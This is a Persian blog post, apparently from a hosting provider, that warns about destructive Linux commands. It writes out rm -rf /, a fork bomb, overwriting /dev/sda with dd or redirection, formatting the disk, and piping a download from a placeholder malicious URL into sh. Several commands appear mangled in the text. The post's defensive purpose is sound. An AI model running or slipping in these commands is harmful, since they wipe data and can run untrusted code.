دستورات خطرناک لینوکس که هرگز نباید اجرا شود

دستورات خطرناک لینوکس

خط دستور سیستم عامل لینوکس، بسیار ساده، مفید و جالب می باشد، اما گاهی اوقات، اجرای برخی دستورات ممکن است بسیار خطرناک باشد خصوصا زمانی که مطمئن نیستید که دستوری که وارد نموده اید، دقیقا چه کاری انجام میدهد.

شما همواره می بایست قبل از اینکه دستورات را اجرا کنید، مطمئن شوید دستوری که وارد میکنید چه کاری انجام میدهد و دقیقا همان کاری را انجام دهید که مدنظر شما است.

در ادامه می خواهیم شما را از برخی از دستورات خطرناک لینوکس آگاه کنیم که قبل از اینکه آنها را اجرا کنید، می بایست آنها را با دقت بررسی نمایید.

دستورات خطرناک لینوکس

 • دستور rm -rf

 • دستور rm -rf یکی از سریع ترین راه ها برای پاک کردن یک پوشه و محتویات آن است. اما یک اشتباه کوچک یا سهل انگاری در اجرای این دستور ممکن است به آسیب پذیری غیر قابل برگشت سیستم منجر شود. برخی دیگر از سوئیچ های قابل استفاده و مهم در دستور rm به شرح زیر هستند:

  دستور rm در لینوکس برای حذف فایل ها استفاده می شود.

 • دستور rm –r  تمامی فولدر ها و نیز فولدرهای خالی را حذف می کند.
 • دستور rm -f پرونده های Read Only File را بدون اینکه تایید بگیرد، پاک می کند.
 • دستور      rm -rf / تمامی محتویات فولدر root را حذف می کند.
 • دستور    *  rm -rf  محتویات دایرکتوری جاری را بطور کامل حذف می کند.
 • دستور     rm -rf  محتویات دایرکتوری جاری و زیر مجموعه های آن را بطور کامل حذف می کند..

  از این رو هنگام اجرای دستور rm -rf مراقب باشید. بعنوان راه حل جایگزین جهت جلوگیری از حذف تصادفی فایل با دستور rm، یک الیاس از دستور rm را با عنوان rm -i  در فایل bashrc. ایجاد کنید. با این کار هربار هنگام اجرای این دستور، تاییدیه حذف از شما پرسیده می شود.

 • دستور :(){:|:&};:

با اجرای دستور بالا یک تابع آرایه توخالی ایجاد شده و تابع خود را دو بار فراخوانی میکند و یکبار در پیش زمینه و یک بار در پس زمینه اجرا میشود. در واقع خود را تکثیر میکند تازمانی که کلیه منابع Ram و CPU  به شدت افزایش پیدا کرده و سیستم از دسترس خارج شود. عملکرد این دستور مشابه ویروسی است که بی وقفه از خود کپی ایجاد میکند، بهمین دلیل با عنوان Fork Bomb شناخته شده است.

10 نکته امنیتی مهم جهت جلوگیری از هک شدن سایت

این حالت مشابه یک حملهDDOS  از داخل سیستم عامل است که همه منابع سخت افزاری را در دست خواهد گرفت و تنها راه متوقف کردن این تابع تو در تو ، ریبوت کردن سخت افزاری سرور شما خواهد بود.

 • دستور dev/sda/ <

یکی دیگر از دستورات مخرب و خطرناک دستور dev/sda/ < می باشد. این دستور خروجی دستور را در مسیر dev/sda/ می نویسد. با اجرای دستور بالا اطلاعات خام در مسیر فوق جایگزین داده های اصلی شده و تمام فایل ها در مسیر فوق با داده های خام جایگزین می شوند و در نتیجه کل داده ها در بلوک حذف می شوند.

 • دستور mv folder /dev/null

دستور بالا پوشه را به dev/null/ منتقل می کند. در لینوکس، فولدر dev/null/ یک فولدر ویژه ای است که تمام داده های نوشته شده داخل آن را حذف می کند و گزارش می دهد که عملیات نوشتن موفقیت آمیز است.
دستور بالا کلیه محتویات دایرکتوری کاربر را به dev/null/ منقل می کند که به اصلاح همه اطلاعات را به سیاه چاله (null)  منتقل می کند.

 • دستور wget https://malicious_source -O- | sh

دستور بالا یک اسکریپت را از یک منبع مخرب دانلود می کند و سپس آن را اجرا می کند. دستور wget اسکریپت را دانلود می کند و sh اسکریپت دانلود را اجرا می کند.
توجه داشته باشید که فقط از آن دسته از اسکریپت ها / برنامه های کاربردی استفاده کنید که از منابع قابل اعتماد دانلود شده باشد و هرگز از منابع متفرقه جهت نصب یا کانفیگ برنامه ها استفاده نکنید و همچنین قبل از اجرا بررسی کنید که دستورات مربوطه چه اعمالی را روی سرور انجام خواهد داد.

 • دستور ext3 /dev/sda

دستور فوق بلوک sda را فرمت می کند و مطمئنا می دانید که بعد از اجرای دستور بالا، کلیه محتوای داخل هارد دیسک حذف می شود، در واقع  هرگونه اطلاعات از روی هارد حذف شده و اطلاعات غیرقابل برگشت می باشد.

 • دستور file <

دستور بالا برای حذف کردن(flush) محتویات فایل استفاده می شود. اگر دستور بالا اشتباها ویا سهوا اجرا شود، نظیر دستور ( xt.conf <)، باعث پاک شدن محتویات فایل های اصلی ویا فایلهای سیستمی یا فایل های پیکربندی می شود.

 • دستور foo^bar^

این دستور، مشابه دستورات قبلی که به آن‌ها اشاره کردیم، خطرناک نیست. این دستور به منظور ویرایش دستوری که قبلا اجرا شده است، بدون آن‌که نیازی به تایپ مجدد دستور باشد. اما استفاده نابجا و مکرر از این دستور می تواند باعث آسیب‌های جبران‌ناپذیری می‌شود. به ویژه اگر دستوری که قبلا اجرا شده است، را بررسی نکرده باشید و یا مطمئن نباشید چه کاری در پس زمینه انجام میدهد، در این حالت دستور foo^bar^  می‌تواند خطرناک باشد.

 • دستور dd if=/dev/random of=/dev/sda

دستور فوق، بلوک sda را پاک می کند و داده های تصادفی و بدردنخور به سمت بلوک ارسال می کندو این باعث می شودکه سیستم در وضعیت ناسازگار و غیرقابل برگشت باقی خواهد ماند.

5روش جلوگیری از تهدیدات ایمیل و حملات در ایمیل

نتیجه گیری

توجه داشته باشید که هیچ یک از دستورات فوق را در ترمینال یا shell سرور لینوکس اجرا نکنید. اگر همچنان مصر هستید که این دستورات را تست کنید، آنها را تنها روی ماشین مجازی (VPS) اجرا کنید و توجه داشته باشید که هر گونه تداخل یا از دست رفتن اطلاعات، به دلیل اجرای هرکدام از دستورات فوق، ممکن است سیستم شما را از بین ببرد.

در صورتی که مقاله فوق مورد توجه شما قرار گرفته پیشنهاد میکنیم مقالات “آموزش کار با دستور cp در لینوکس برای کپی کردن فایل و پوشه ها” و ”هاست لینوکس چیست ؟ ۴ مزایای هاست لینوکس” در بلاگ مرواهاست مطالعه فرمایید

فیس بوک
توییتر
لینکدین
تامبلر
پین ترست
رددیت
ایمیل

جدیدترین مطالب

عضویت در خبرنامه

اینستاگرام

فیسبوک

توییتر

16 خرداد 1402

در 13:02

آموزش فعالسازی ssl در کلودفلر هدف اصلی ما در تدوین این مقاله است. گواهی SSL همان چیزی است که وب‌سایت‌ها را قادر می‌سازد از HTTP به سمت HTTPS که امنیت بیشتری ...

7 خرداد 1402

در 20:55

انتخاب و خرید هاست برای وب سایت، یکی از مهم‌ترین تصمیماتی است که برای تجارت آنلاین خود انجام می‌دهید. این انتخاب می‌تواند، امنیت و کارکرد درست وب سایت را برا...

31 اردیبهشت 1402

در 12:53

نصب سی پنل در سرور لینوکس می‌تواند یک تغییر برای مدیریت محیط میزبانی وب باشد. سی پنل با یک رابط گرافیکی کاربرپسند، کارهایی مانند مدیریت فایل‌های وب سایت، ایج...

27 اردیبهشت 1402

در 18:42

ساخت و راه‌اندازی وب سایت، یکی از مهم‌ترین امکانات و راه‌های ارتباط مشتریان با برند شما است. پس از این که سایت مورد نظر، توسط مهندسان برای کسب و کار شما طراح...

24 اردیبهشت 1402

در 12:54

اگر یک کسب‌وکار آنلاین دارید، انتخاب هاست مناسب، یکی از حیاتی‌ترین تصمیمات برای کارکرد صحیح یک وب‌سایت است. عملکرد، قابلیت اطمینان، امنیت و بسیاری از ویژگی‌ه...

21 اردیبهشت 1402

در 23:58

DNS یک مفهوم اساسی در دنیای آنلاین است و عملیاتی که طی آن انجام می‌شود، به کاربران در سراسر جهان هر روز، امکان دسترسی به میلیاردها وب سایت را می‌دهد. اما DNS...